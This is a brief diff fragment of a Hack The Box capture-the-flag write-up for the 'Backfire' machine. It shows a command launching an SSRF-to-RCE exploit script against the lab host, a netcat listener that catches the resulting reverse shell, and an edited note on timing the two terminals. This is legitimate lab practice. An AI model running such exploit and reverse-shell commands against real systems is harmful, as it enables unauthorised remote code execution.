ClearLotus-git/writeups/HacktheBox/Backfire.md

 ```
 sudo python3 SSRF_RCE.py -t https://backfire.htb -i 127.0.0.1 -p 40056
 ```
-(Note: Make sure they are in seperate terminals and run them one after another)
+(Note: Make sure they are in seperate terminals and run them all at once.
+I had to press them simultaneously)
 ### 🧑‍💻My Machine
 ```
 nc -lnvp 40056